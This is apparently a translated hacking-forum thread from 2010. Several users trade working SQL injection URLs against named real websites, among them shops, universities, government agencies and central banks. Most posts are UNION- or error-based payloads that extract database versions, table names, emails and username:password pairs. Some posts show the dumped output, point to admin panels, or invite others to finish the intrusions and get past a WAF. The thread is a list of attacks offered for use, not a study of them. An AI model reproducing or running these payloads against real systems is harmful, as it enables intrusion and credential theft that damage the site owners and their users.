https://www.srknives.com/popup_img.php?pid=-657+union+select+1,group_concat(table_name+separat or+0x7c),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18, 19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+fr om+information_schema.tables+where+table_schema=0x 636172745f73726b6e697665736c6976655f636f6d--
http://www.jkteashop.com/index.php?main_page=teainfo&cate_id=2&id=-68+union+select+1,group_concat(table_name+separato r+0x7c)+from+information_schema.tables+where+table _schema=0x6a6b74656173686f5f746561--
http://www.muttugly.com/shop/product.php?id=-193+union+select+1,2,3,group_concat(column_name+se parator+0x7c),5,6,7,8,9,10+from+information_schema .columns+where+table_schema=0x746f78696374775f6d75 747475676c79+and+table_name=0x6f7264657273--
http://www.mondorecords.com/shop.php?id=-441+union+select+1,2,version(),4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29,30,31,32,33,34,35,36,37--
http://www.colemanirishmusic.com/shop/product.php?id=-11+union+select+1,2,version(),4,5,6,7,8,9,10,11,12 ,13,14--
*uNkN0Wn*
22.08.2010, 11:42
PR - 5
http://www.trentondevils.com/page.php?pid=-204+union+select+1,2,3,group_concat(email),5,6,7,8 ,9,10,11,12,13,14+from+tdevils_db.staff--
user() tdevils@localhost
version() 5.0.45
database() tdevils_db
PR - 5
http://www.easypeasy.com/guides/article.php?article=-197+union+select+1,2,group_concat(username,char(58 ),password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20+from+easypeasy.hwz_users--
user() easypeasy@localhost
version() 5.0.51a-3ubuntu5.4
database() easypeasy
PR - 3
http://www.umracing.com/instructionsDetails.php?InstID=-19+union+select+1,2,3,4,5,group_concat(UserName,ch ar(58),Password),7,8,9,10,11,12,13,14+from+william oravetz_umracing.Users--
user() umracing@localhost
version() 5.0.27-log
database() williamoravetz_umracing
http://www.umracing.com/admin
Code:
http://www.black-stones.ru/restoran.php?ID=-4+union+select+1,2,3,version(),5,6,7,8--
TIC 10
satana-fu
22.08.2010, 14:50
PHP:
http://www.donny.co.uk/Doncaster/events/event.php?ID=-26879+union+select+1,version(),3,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23+--
http://www.donny.co.uk/Doncaster/events/event.php?ID=-26879+union+select+1,group_concat(namelc,char(58), password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23++from+phplist_admin+
PHP:
http://www.telenetholidays.com/holidays/travel.php?ID=-85+UnIon+selECt+group_concat(user(),char(58),datab ase(),char(58),version()),2,3,4+--+
moodoone
22.08.2010, 16:01
PHP:
http://www.riwcentries.com/riwc09results/printaward/labels.php?id=-1546+UnIon+selECt+1,2,concat_ws(0x3a,username,pass word)+from+users+limit+0,1--+
PHP:
http://www.channel5belize.com/archive_detail_story.php?story_id=-1+union+select+1,2,group_concat(username,char(58), password),4,5,6,7+from+admin_login--+
furniture store
Code:
http://www.amadey.com/base.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),data base(),user(),@@version_compile_os),5,6,7,8,9,10,1 1,12,13,14,15,16,17,18--&p=4
real estate.
Code:
http://www.kvadratgroup.com/sale/base.php?act=list&obj=-6+union+select+1,2,3,4,version(),6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26--
some association
Code:
http://www.theassociates.com.au/base.php?pg=jobdet&id=-87+UnIoN+SelEcT+1,version(),3,4,5,6,7,8,9,10,11,12 ,13,14,15--
upholstered furniture
Code:
http://www.divaninfo.ru/base.php?id=-143+union+select+1,2,3,concat_ws(0x3a,version(),da tabase(),user(),@@version_compile_os),5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23--
medical portal
Code:
http://tutd0kt0r.ru/base.php?id=-19+union+select+1,2,3,concat_ws(0x3a,version(),dat abase(),user(),@@version_compile_os)--&lev=0
design group
Code:
http://www.flatart.ru/base.php?id=-20+union+select+1,2,3,concat_ws(0x3a,version(),dat abase(),user(),@@version_compile_os)--
plastic windows
Code:
http://info-trocal.ru/base.php?id=-52+union+select+1,2,3,concat_ws(0x3a,version(),dat abase(),user(),@@version_compile_os)--
medical portal
Code:
http://med-55.ru/base.php?id=-174+union+select+1,2,3,concat_ws(0x3a,version(),da tabase(),user(),@@version_compile_os)--&lev=1
furniture, a nice-looking site
Code:
http://cesorp.ru/base.php?id=-315+union+select+1,2,3,concat_ws(0x3a,version(),da tabase(),user(),@@version_compile_os)--&lev=1
http://www.cinemagine.com/news.asp?id=37+or+(1,1)=(select+count(0),concat((s elect+version()+from+information_schema.tables+lim it+0,1),floor(rand(0)*2))from(information_schema.t ables)+group+by+2)--+
well done guys, keep it up
off-roader portal
Code:
http://centerforstudyofpublicchoice.com/base.php?id=-668+union+select+1,2,3,concat_ws(0x3a,version(),da tabase(),user(),@@version_compile_os)--&lev=1
music site\shop (there are cards) PR-4
Code:
http://www.canyoufeelitmedia.com/master.php?page=mediaitem&id=-271+union+select+1,2,concat_ws(0x3a,version(),data base(),user(),@@version_compile_os),4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20--
some baffling site ^_^
Code:
http://w3.sc-du-langage.univ-tlse2.fr/parcours-master.php?id=-105+union+select+1,2,3,4,5,6,version()--
moodoone
22.08.2010, 17:45
Code:
http://www.go-whippet.co.uk/announce.php?id=-9+UnIon+selECt+1,2,group_concat(table_name),4,5,6, 7+from+information_schema.tables+where+table_shema =database()--
-PRIVAT-
22.08.2010, 18:01
http://www.vanderveer.org.nz/personnel/person.php?id=-24+union+select+1,2,3,4,5,6,7,8,9,0,1,2+--+
PR 4
http://www.fkefir.ru/person.php?id=-2+union+select+1,2,3,4,concat_ws%280x3a,id,login,p assword%29+from+tm_admins--
PR 3 TIC 235. Fruktovy Kefir - the band's official site. xD laughed for half an hour
I'm not going to work SQL injections up to the admin panel any more, because yesterday some bad person uploaded a shell, so here is an SQLi on a Thai site, worked up only to a regular user
Code:
http://www.cbh.moph.go.th/source/News/tor.php?id_news=-325+union+select+1,concat_ws(0x3a,user_name,user_p assword),3,4,5,6,7,8,9,10,11,12+from+user_login+--+
and this one is just for good measure
Code:
http://www.imagesfestival.com/call.php?id=-8+union+select+1,2,3,4,user(),6,7,8,9,10,11+--+
one more worked-out one
Code:
http://www.pescador.online.pt/mar.php?id=-4+union+select+1,2,concat_ws(0x3a,nick,psw)+from+U sers+--+
moodoone
22.08.2010, 19:21
Code:
http://stonezone.com/article.php?id=181-999.9+union+select+1,2,3,4,5--
Code:
http://www.jakehalpern.com/article.php?id=58-999.9+union+select+1,2,3,version(),5--
Code:
http://www.compete.pl/abstract.php?id=4-999.9+union+select+1,2,3,version()--
Code:
http://www.offix.com/career.php?ID=2-999.9+union+select+1,2,VERSION(),4--
Code:
http://www.mind-infotech.com/career.php?j_id=13-999.9+union+select+1,2,3,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18--
P.S. I didn't develop them further. Couldn't be bothered. You can do it for me)
http://www.bars.ru/career.php?id=-1+union+select+1,group_concat(database(),0x3a,user (),0x3a,version()),3,4,5,6,7,8,9,10,11--+
bars:bars1@localhost:4.1.25-log
PR: 3 TIC: 40
http://www.kraina-z.com.ua/career.php?id=2+'+union+select+1,group_concat(vers ion(),0x3a,database()),3,4+from+information_schema .tables--+
5.0.51a-community-nt:db_kraina
http://www.bms-service.ru/press.php?id=-17+union+select+1,2,group_concat(version(),0x3a,us er())+--+
4.1.22-log:bmsservice_bms@localhost
IT people's site, Irish domain
Code:
http://www.ittconference.ie/main.php?ID=2+and+1=0+union+select+1,concat_ws(0x3 a,username,password),3,4,5,6,7+from+itt_reviewer+--+
didn't touch the admins, showed ordinary users; the result is hidden between the tags
IT & T Conference - $username:$hash
cruise center
NEPTUN
http://www.neptun.ru/region/?regroup=1®ion=-2+and+1=2+union+all+select+concat_ws(char(58),@@ve rsion,user(),database(),@@version_compile_os)--
version : 5.1.32-log
user : neptun@localhost
database : neptun
os : portbld-freebsd7.1
can be used.... 198 tables
/admin/
A little hole in a large portal
PR8
http://www.unifem.org/materials/item_detail.php?ProductID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,39,40,41,42,43,concat(0x3a3a,U SER())/*+
user: unifemdata@lma770.siteprotect.com
Code:
http://www.rijkheusden.nl/Content/base.php?ID=-88+UnIon+selECt+1,2,user(),4,5,6,7,8,9,10,11,12,13 ,14,15,16+--+
TIC — 10
PR — 4
satana-fu
23.08.2010, 02:16
boredom is a terrible thing
PHP:
http://www.theatreroyalwindsor.co.uk/event.php?id=-274+union+select+1,group_concat(database(),char(58 ),user(),char(58),version(),char(58),@@version_com pile_os),3+--
I've always liked admin passwords in plaintext
Code:
http://www.eccoid.com/OURWORK/1.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,username,u ser_password),7,8,9,10,11,12+from+user+--+
Code:
http://www.soldatru.ru/read.php?id=-774+UNIOn+SELEcT+1,2,3,4,5,6,7,8,9,10,11,12,13,14--
sorry for being off-topic, but Russia's little soldiers are on fire =)
maybe someone will develop it further
Code:
http://www.dhammaweb.net/Tipitaka/read.php?id=-153+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,vers ion(),database(),user(),@@version_compile_os),9,10 ,11,12,13,14,15,16,17,18,19,20,21--
Code:
http://www.hdtinfo.com/news/read.php?id=-1157947239+union+select+1,concat_ws(0x3a,version() ,database(),user(),@@version_compile_os),3,4,5--
pr-3
Code:
http://eye.box.sk/read.php?id=-5425+union+select+1,2,3,4,5,concat_ws(0x3a,version (),database(),user(),@@version_compile_os),7--
TIC-20
pr-4
Batman's site
TIC 10
pr 3
Code:
http://www.adultfyi.com/read.php?ID=-21846+union+select+1,2,3,4,concat_ws(0x3a,version( ),database(),user(),@@version_compile_os),6,7,8--
a bit of porn late at night won't hurt
Code:
http://www.collegedrunkfest.com/sex.php?id=267+and+1=0+union+select+1,2,concat_ws( 0x3a,user,name),4,5+from+sexmoves+limit+3,1--+
and one more worked-out one
Code:
http://www.osiam.com/sex/sex.php?id=-1+union+select+1,concat_ws(0x3a,username,password) ,3,4,5+from+members+--+
http://www.townofryeny.gov/index.php?act=view_cms&id=-4+union+select+1,group_concat(0x0b,admin_id,0x3a,a dmin_name,0x3a,admin_pwd),3,4,5,6,7,8,9,10+from+ad min+--&contentFull=full
PR 4
panel: /admin/
Code:
http://www.kstw.de/index.php?option=com_presse&view=einzel&Itemid=211&Tid=-714+UNION+SELECT+concat_ws%280x3a,user%28%29,versi on%28%29,database%28%29%29,2,3,4,5,6--
Username: root@localhost
Version: 5.1.41-community
Database: internet
Google PR: 6
moodoone
23.08.2010, 15:14
Code:
http://www.ovislink.biz/tech.phtml?item_id=-593+UnIon+selECt+1,2,3,4--
Code:
http://www.globalhockey.net/news-full.php?id=-77+UnIon+selECt+1,version(),3,4,5,6,7--
daniel_1024
23.08.2010, 20:04
PJSC "Dongorbank"
PR: 5 TIC: 425
Code:
http://www.dongorbank.com/ru/press/news.php?id=43+and+1=0+union+select+1,2,version(), 4,5,6,7,8,9,10,11--
Version: 5.0.51a-24+lenny3-log
Database: wwwQHios
User: u_wwwQHios@localhost
Code:
http://globalanti.risa.ru/print.php?cat_id=31&doc_id=-172+union+select+1,2,3,concat_ws(0x3a,user_login,u ser_psw),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21+from+risa_globalanti.users+limit+1,1--
PR 5
Code:
http://gamebooks.org/show_user_reviews.php?id=-1+union+select+concat_ws(0x2b,version(),user(),@@v ersion_compile_os),2,3,4+--+
5.0.45-community+gamebooks@localhost+pc-linux-gnu's Reviews
Code:
http://gamebooks.org/show_user_reviews.php?id=-1+union+select+concat_ws(0x3a,Username,Password),2 ,3,4+from+Users--+
In plain view
let's slowly get started
Code:
http://www.narbilisim.com/nar.php?p=haber&id=-43+union+select+concat_ws(0x3a,version(),database( ),user(),@@version_compile_os)+--+
Code:
http://myfourthirds.com/user.php?id=-2581+union+select+1,2,3,4,5,6,concat_ws(0x3a,versi on(),database(),user(),@@version_compile_os),8,9,1 0,11+--+
Code:
http://contaxg.com/user.php?id=-1167+union+select+1,2,3,4,5,6,concat_ws(0x3a,user_ nickname,user_passwd),8,9,10,11+from+users+--+
Code:
http://www.flexelec.com/produits/detail.php?id=-28+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29+--+
Twin $park
24.08.2010, 01:57
Bank of Philippines
Mssql
http://www.bsp.gov.ph/regulations/regulations.asp?type=2+and+1=@@version--
Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
http://www.bsp.gov.ph/regulations/regulations.asp?type=(select+top+1+password+from+u sers)--
users:
userID
username
password
*uNkN0Wn*
24.08.2010, 02:57
PR - 3
http://www.revisionone.com/articles/show.php?record_ID=-21+union+select+1,2,3,group_concat(User_Name,Char( 58),User_Pass),5,6,7,8+from+revisi2_goodeats.tbl_u ser--
user() revisi2_jamie@localhost
version() 5.0.90-community
database() revisi2_revisionone
Konqi: who is the anti-repost check for? =\
satana-fu
24.08.2010, 05:33
http://e360.yale.edu/content/digest.msp?id=-2282+union+select+1,group_concat(username,char(58) ,password+separator+'%3Cbr%3E'),3,4,5,6,7+from+e36 0.users+--
..........................................
satana-fu
24.08.2010, 06:47
http://www.daawa-info.net/news.php?id=-9838+union+select+1,concat_ws(char(58),adminuser,a dminpass),3,4,5,6,7,8,9,10+from+banneradmin+--
http://www.soundofart.net/news.php?id=-53+union+select+1,concat_ws(char(58),user(),databa se(),version()),3,4,5,6,7,8,9
http://www.gachet.org/site/news.php?id=-50+union+select+concat(username,0x3a,user_password ),2,3+from+gachet_cms.phpbb_users+--
............................
*uNkN0Wn*
24.08.2010, 10:46
PR - 4
http://www.frpatb.net/index.php?rub=-107+union+select+1,group_concat(user,char(58),pass ),3+from+frpatb_net.admin_user--
user() kornog@localhost
version() 5.1.45-0.dotdeb.0
database() frpatb_net
PR - 3
http://www.endopedonline.com.ar/esp/data.php?menu=-8+union+select+1,2,3,4,5,group_concat(username,cha r(58),pass),7,8,9,10,11+from+endopedonline.users--
user() endopedonline@192.168.0.130
version() 5.0.22-max-log
database() endopedonline
-PRIVAT-
24.08.2010, 11:06
http://www.morexpertise.com/browse_articles.php?cat=-2+union+select+1--
PR 4
http://www.thejigsaw.co.ke/website/browse_articles.php?section=-22+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7% 20--
PR 4
http://www.france-israel.org/modules/print_articles.php?art_id=-650+union+select+1 --
PR 4
http://www1.alliancefr.com/modules/print_articles.php?art_id=-9419+union+select+ --
PR 5 TIC 20
http://www.eto.com.ua/print_new.php?id=-802+union+select+1,version%28%29,3,4,5,6,7,8,9,0,1 ,2%20--
PR 5 TIC 20
http://www.leadingfathers.info/news/print_w.php?id=-14+union+select+1,2,3,4,5,6,7,8--
PR 5
http://magprice.info/print_t.php?id=-23982+union+select+1,2,3,4,5,6,7,8--
PR 1
http://www.centrpsihoterapii.com.ua/vo.php?id=-8+union+select+1,2,3,4,5,6,7,8,9%20--
TIC 10 PR 3
http://www.ptsys.ru/print_product.php?id=-5385+union+select+1,2,3,4,5,6,7,8,concat%28@i:=0x0 0,@o:=0x0d0a,benchmark%2825,@o:=CONCAT%28@o,0x0d0a ,%28SELECT+concat%28table_schema,0x2E,@i:=table_na me%29+from+information_schema.tables+WHERE+table_n ame%3E@i+order+by+table_name+LIMIT%201%29%29%29,@o %29,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4%20--
TIC 150 PR 3
http://segal.ogl.ru/read.php?news_id=73+union+select+1,2,3,4,5,6,7,8,9 ,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9--
TIC 1100 PR 5
http://rabota.co.uk/index.php?p=vv&id=60+union+select+1,2,3,4,5,6,7,8,9,0--
PR 1
http://www.parta.kiev.ua/anecdot.php?id=-6+union+select+1,2,3,4,5,6,7,9,9%20--
TIC 10 PR 4
http://www.thailandamulets.com/history.php?id=-12+union+select+1,2,3,4,5,6--
PR 5
http://www.rialtotheatre.com/PRINT_text.php?id=-3+union+select+1,version(),3,4,5,4,7,8,9,0,1,2,3,4 ,5,6,7,8,9,0,1--
PR 5
http://www.saudemutua.pt/print_txt.php?id=-25+union+select+1,2,3,4,concat%28@i:=0x00,@o:=0x0d 0a,benchmark%2810,@o:=CONCAT%28@o,0x0d0a,%28SELECT +concat%28table_schema,0x2E,@i:=table_name%29+from +information_schema.tables+WHERE+table_name%3E@i+o rder+by+table_name+LIMIT%201%29%29%29,@o%29,6,7,8, 9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3, 4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8, 9,0,1,2,3--
http://www.3dworks.ru/print_text.php?id=-159+union+select+1,concat%28@i:=0x00,@o:=0x0d0a,be nchmark%2880,@o:=CONCAT%28@o,0x0d0a,%28SELECT+conc at%28table_schema,0x2E,@i:=table_name%29+from+info rmation_schema.tables+WHERE+table_name%3E@i+order+ by+table_name+LIMIT%201%29%29%29,@o%29,3,4,5,6,7,8 ,9,0--
TIC 30 PR 2
http://mawi-tourism.ru/print_text.php?print=&menu0=12&menu=12&id=-44+union+select+1,concat%28@i:=0x00,@o:=0x0d0a,ben chmark%28100,@o:=CONCAT%28@o,0x0d0a,%28SELECT+conc at%28table_schema,0x2E,@i:=table_name%29+from+info rmation_schema.tables+WHERE+table_name%3E@i+order+ by+table_name+LIMIT%201%29%29%29,@o%29,3,4,5,6,7,8 ,9,0,1%20--
PR 3
http://www.observatoire-laxisme-ecole.fr/print_text.php?id=-27+union+select+1,2,concat%28@i:=0x00,@o:=0x0d0a,b enchmark%2825,@o:=CONCAT%28@o,0x0d0a,%28SELECT+con cat%28table_schema,0x2E,@i:=table_name%29+from+inf ormation_schema.tables+WHERE+table_name%3E@i+order +by+table_name+LIMIT%201%29%29%29,@o%29,4,5,6,7,8, 9%20--
PR 3
http://www.omkatalog.ru/print_text.php?id=-5+union+select+1,2,3,4,5,6,7,8,9,10%20--
moodoone
24.08.2010, 16:14
Code:
http://www.ber.te.ua/cgi-bin/viche/index.cgi?archive=-20060721+UnIon+selECt+1,2,3,4,table_name,6,7,8,9+f rom+information_schema.tables--+
Whoever works it through to the end, please ping me via PM
http://www.drugreg.ru/Doc/DocDownload.asp?idPage=51[SQL INJECTION]
Version: Microsoft
SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TA BLES+WHERE+TABLE_NAME+NOT+IN+('UserQuerysDoc','Cou ntClicksLink','bnr_clicks','bnr_contains','bnr_mai n','bnr_owners','bnr_types','DownloadFiles','Downl oadFilesWebPages','Downloads','DownloadsSent','Dow nloadTypes','DownloadTypesWebPages','DownloadWebPa ges','dtproperties','GeoAreas','GeoCountryType','G eoRegions','MailSendOk','SendMailOnce','SendMailOn ceWhat','SendUnitTypes','Services','ServiceTypes', 'ServiceTypesSend','ServiceTypesSendLog','sysconst raints','syssegments','UserQuerys','UserQueryTypes ','UserQueryTypesMain','Users','UsersLog','UsersMs g','UsersMsgSent','UsersMsgSent_Dubl','UsersServic es','UsersUserType','UserTypes')
http://www.weblaw.edu.au/display_resource.phtml?rid=3366%27+or+%281,1%29=%2 8select+count%280%29,concat%28%28select+concat%28e d_username,char%2858%29,ed_password%29+from+editor +limit+0,1%29,floor%28rand%280%29*2%29%29from%28in formation_schema.tables%29+group+by+2%29--+
PR-6
-----
http://www.stopthinkdo.com/display_article.phtml?article_id=6+and+substring(v ersion(),1,1)=3
-----
http://www.icmi.com.au/resource.phtml?id=-13+union+select+1,2,3,4,5,version()
------
http://www.cafeproductsdirect.com.au/listing.phtml?expand=1&selected=118+union+select+1,2,version(),4,5
*uNkN0Wn*
24.08.2010, 17:05
PR - 5
http://experts.uwaterloo.ca/experts.php?id=-40+union+select+group_concat(email),2+from+cpa_exp erts.users+--+
user() cpa_experts@strobe.uwaterloo.ca
version() 5.0.85-community-log
database() cpa_experts
http://calendar.uwaterloo.ca/event?id=-4431+union+select+1,group_concat(email),3,4,5,6,7, 8,9,10,11,12+from+cpa_calendar.users+--+
user() cpa_calendar@strobe.uwaterloo.ca
version() 5.0.85-community-log
database() cpa_calendar
http://www.library.uq.edu.au/hotnews/index.phtml?id=63'or+(1,1)=(select+count(0),concat ((select+version()+from+information_schema.tables+ limit+0,1),floor(rand(0)*2))from(information_schem a.tables)+group+by+2)--+
PR-7
-PRIVAT-
24.08.2010, 18:21
http://www.funiculars.net/line.php?id=-85+union+select+1,2,3,4,concat%28@i:=0x00,@o:=0x0d 0a,benchmark%2810,@o:=CONCAT%28@o,0x0d0a,%28SELECT +concat%28table_schema,0x2E,@i:=table_name%29+from +information_schema.tables+WHERE+table_name%3E@i+o rder+by+table_name+LIMIT%201%29%29%29,@o%29,6,7,8, 9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3, 4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5--
PR 3
*uNkN0Wn*
24.08.2010, 18:41
PR - 6
http://sju.ca/courses/faculty.php?unit=-18+union+select+group_concat(email+separator+'%3Cb r%3E')+from+sjudb.events+--+
independent consulting group
2K Audit - Business Consulting
http://www.2kaudit.ru/services.php?id=-153+and+1=2+union+all+select+1,2,3,concat_ws(0x3a, @@version,user(),database(),@@version_compile_os), 5,6,7,8,9,10,11,12,13,14,15--+
version : 4.0.27-log
user : 2kaudit-ru@fhe2.hoster.ru
database : 2kaudit-ru
os : portbld-freebsd7.0
Code:
list-a-day.com/?Gamequarium&id=-868+or 1=0+union select 1,version(),3,4,5,6--
Mysql=5
Whoever manages to bypass the WAF, please write to me via PM
[Feldmarschall]
25.08.2010, 02:25
BANK OF LEBANON (Banque du Liban)
Code:
http://www.bdl.gov.lb/edata/subseries.asp?SIID=13+union+select+1,2,3,4,5,6,7,8 +from+MSysAccessXML
*uNkN0Wn*
25.08.2010, 12:37
PR - 5
http://www.socialistreview.org.uk/article.php?articlenumber=-8609+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group _concat(name,char(58),password),14,15,16,17,18,19, 20,21+from+srdb01.auth+--+
user() srdb01@195.8.80.54
version() 5.0.77-log
database() srdb01
www.socialistreview.org.uk/admin
PR - 2
http://www.nerdrium.com/article.php?articleNumber=-26+union+select+group_concat(userName,char(58),enc Pass)+from+nerdriu_tricitycc.members+--+
user() nerdriu_grfnkmp@localhost
version() 5.0.89-community
database() nerdriu_nerdrium
Exchange office monitoring
http://wmrates.net/detail.php?xobmen=60+union+select+1,version(),3,4, 5,6,7,8,9,10,11,12,13,14,15,16,17
*uNkN0Wn*
25.08.2010, 16:01
PR - 4
http://www.desilassi.com/AtoZ.php?lid=-1+union+select+1,group_concat(username,char(58),pa ssword),3,4+from+administration_users--
user() dbo316503927@74.208.180.21
version() 5.0.81-log
database() db316503927
desilassi.com/admin
PR - 3
http://extremebodyshaping.com/locations_main.php?lid=-12+union+select+1,group_concat(UserName,char(58),U serPwd),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,1 9,20,21+from+users--
user() extremebodyshapi@localhost
version() 5.0.22
database() extremebodyshaping
extremebodyshaping.com/admin
http://www.zenithchambers.co.uk/about_details.php?lid=-9+union+select+1,group_concat(username),3,4,5,6+fr om+users+--+
That's all I got out
Marsipan
25.08.2010, 16:02
Code:
http://www.smdailyjournal.com/article_preview.php?title=DA:&id=-1+and+1=0+union+select+1,2,concat_ws(0x3a3a3a,vers ion(),database(),user()),4,5,6,7,8,9,10,11,12,13,1 4,15--
4.0.25:::smdaily2:::smdaily2@localhost
Code:
http://www.bilet-da.ru/best.php?id=-1+and+1=0+union+select+1,2,concat_ws(0x3a3a3a,vers ion(),database(),user()),4,5,6,7,8,9,10,11,12,13,1 4,15--
5.0.77:::biletda_ru:::biletdaru@localhost
Code:
http://www.dilhaidesi.com/lyrics/song.php?name=Ja%20Ni%20Tera%20Pyar%20Kudey&movie=Captain%20Bhangre%20Da&id=-1+union+select+1,2,3,4,5,concat_ws(0x3a3a3a,versio n(),database(),user())--
5.1.33:::dilhaidesi_main:::dilhaidesi_main@localho st
Code:
http://www.biletda.ru/best.php?id=-1+and+1=0+union+select+1,2,concat_ws(0x3a3a3a,vers ion(),database(),user()),4,5,6,7,8,9,10,11,12,13,1 4,15--
5.0.77:::biletda_ru:::biletdaru@localhost
*uNkN0Wn*
25.08.2010, 16:37
PR - 3
http://www.kandahar-taos.com/property-detail.php?lid=-15+union+select+1,2,group_concat(username,char(58) ,password),4,5,6,7,8+from+admin--
user() kandahar@localhost
version() 5.0.82sp1
database() kandahar
gazprom
http://www.msk-tr.gazprom.ru/news/jubilee/item.php?jubileeID=-43+union+select+1,2,3,4,group_concat(login,0x3A,pa ssword+SEPARATOR+0x0b),6,7,8,9+FROM+mtg131_main.us ers--
Information for the moderators. The first time I posted this SQLi, it was MySQL 4 and the tables had not been brute-forced. They have since upgraded and now have MySQL 5*. Anyway, here it is: the worked-out SQLi.
http://stim-parquet.ru/newspod.php?id=25&table=news_sait+where+1=2+union+select+1,concat_ws (0x3a,version(),user(),database()),3,4,5,6,7,8,9,1 0,11,12,13,14+from+st_news_sait
shop
http://www.artsmia.org/viewer/detail.php?id=548&i=1&v=911.911+union+ALL+select+1,2,3,4,5,6,7,8,9,10,11 ,12,13,14,15,group_concat(version(),0x3a,database( ),0x3a,user()),17,18,19+--+
http://www.rsapc.com/projects/detail.php?id=-174+union+select+1,version(),3,4,5,6,7,8,9,10,11,1 2--+++
Marsipan
26.08.2010, 00:30
voiturembeep@10.0.45.89:::voiturembeep:::5.0.90-log::
Code:
http://www.mpac.org/article.php?id=-725'+union+select+1,concat_ws(0x3a,user(),0x3a,dat abase(),0x3a,version(),0x3a),3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23%23
Sanilulu_nigeria@localhost:::sanilulu_nff:::5.0.91-community::
Code:
http://www.nigeriaff.com/Newsdisplay.php?ID=-167+union+select+1,concat_ws(0x3a,user(),0x3a,data base(),0x3a,version(),0x3a),3,4,5,6,7,8,9,10,11
cantbkbat@boscgi0502.eigbox.net:::ntbkca:::5.0.51a-log::
Code:
http://www.battery-notebook.ca/info.php?pid=-5305'+union+select+1,2,3,4,concat_ws(0x3a,user(),0 x3a,database(),0x3a,version(),0x3a),6,7,8,9,10,11, 12,13,14,15,16,17,18,19%23
ithink@localhost:::ithinkmusic:::5.0.77::
Code:
http://dubkraftrecords.ithinkmusic.com/my-store/detail.php?r=-12039/**/UNION/**/SELECT/**/1,concat_ws(0x3a,user(),0x3a,database(),0x3a,versi on(),0x3a),3,4,5,6,7,8,9%23
http://www.digitalpodcast.com/detail.php?id=-19468+union+select+version(),2,3--
[Feldmarschall]
26.08.2010, 01:46
Bank of the Lao P.D.R.
Code:
http://www.bol.gov.la/english/news_report.php?nid=-42+union+select+1,concat_ws(0x3a,version(),user(), database(),cast(user as char),cast(password as char)),3,4,5,6,7,8+from+mysql.user--
p.s file_priv Y
Well, sitting around won't help, we have to start... Let's support our comrades and go through the banks
Banque Atlantique
Code:
http://www.banqueatlantique.net/index.php?parcours=article&rubrique=-1+union+select+1,2,concat_ws(0x3a,admin,password), 4,concat_ws(0x3a,version(),database(),user(),@@ver sion_compile_os),6,7,8,9,10,11,12,13,14,15,16,17,1 8+from+webuser+--+
Marsipan
26.08.2010, 03:12
PR - 3
Code:
http://www.kandahar-taos.com/property-detail.php?lid=-15+union+select+1,2,group_concat(username,char(58) ,password),4,5,6,7,8+from+admin--
user() kandahar@localhost
version() 5.0.82sp1
database() kandahar
PR - 3
Code:
http://extremebodyshaping.com/locations_main.php?lid=-12+union+select+1,group_concat(UserName,char(58),U serPwd),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,1 9,20,21+from+users--
user() extremebodyshapi@localhost
version() 5.0.22
database() extremebodyshaping
Code:
extremebodyshaping.com/admin
pr 4
Code:
http://www.desilassi.com/AtoZ.php?lid=-1+union+select+1,group_concat(username,char(58),pa ssword),3,4+from+administration_users--
user() dbo316503927@74.208.180.21
version() 5.0.81-log
database() db316503927
Code:
desilassi.com/admin
let's continue the banking theme
Banque BEMO
Code:
http://www.bemobank.com/bemo.php?id1=-12+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user(),@@version_compile_os),4+--+
Code:
http://www.unar.fr/pgs/news.php?id=-21+union+select+1,2,3,4,5,6,group_concat%28table_n ame+separator+0x3a%29,8,9,10,11,12,13,14,15,16+fro m+information_schema.tables+where+table_schema=0x6 36d323330363737+--+
Code:
http://www.unar.fr/pgs/news.php?id=-21+union+select+1,2,3,4,5,6,group_concat%28column_ name+separator+0x3a%29,8,9,10,11,12,13,14,15,16+fr om+information_schema.columns+where+table_name=0x6 36c69656e7473+--+
Code:
http://www.unar.fr/pgs/news.php?id=-21+union+select+1,2,3,4,5,6,group_concat%280x0b,id ,0x3a,login,0x3a,pwd%29,8,9,10,11,12,13,14,15,16+f rom+clients+limit+0,20+--+
-PRIVAT-
26.08.2010, 16:09
http://www.colombotown.com/print_advert.php?id=-138+union+select+1,2,3,concat_ws%280x3a,login_id,u serid,pass%29,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2, 3+from+login%20--
PR 1
